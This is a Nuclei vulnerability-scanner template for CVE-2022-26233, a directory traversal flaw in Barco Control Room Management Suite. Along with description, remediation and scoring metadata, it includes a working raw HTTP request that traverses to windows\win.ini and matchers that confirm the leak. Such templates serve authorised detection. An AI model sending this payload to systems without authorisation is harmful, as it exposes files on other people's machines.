nuclei-templates/http/cves/2022/CVE-2022-26233.yaml

46 lines
1.7 KiB
YAML

id: CVE-2022-26233
info:
name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
remediation: |
Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
reference:
- https://0day.today/exploit/37579
- http://seclists.org/fulldisclosure/2022/Apr/0
- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26233
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
epss-score: 0.00631
epss-percentile: 0.76703
cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: barco
product: control_room_management_suite
tags: cve,cve2022,barco,lfi,seclists,packetstorm
http:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# digest: 4b0a00483046022100f0d8124784d4eb142b5a76e2866e2f5900cffd3ca40783589e6edcfe75f962fc022100df40eab99c08ea529942fca52325bafefa226400e1bb72b6e0ea4e4d702c5331:922c64590222798bb761d5b6d8e72950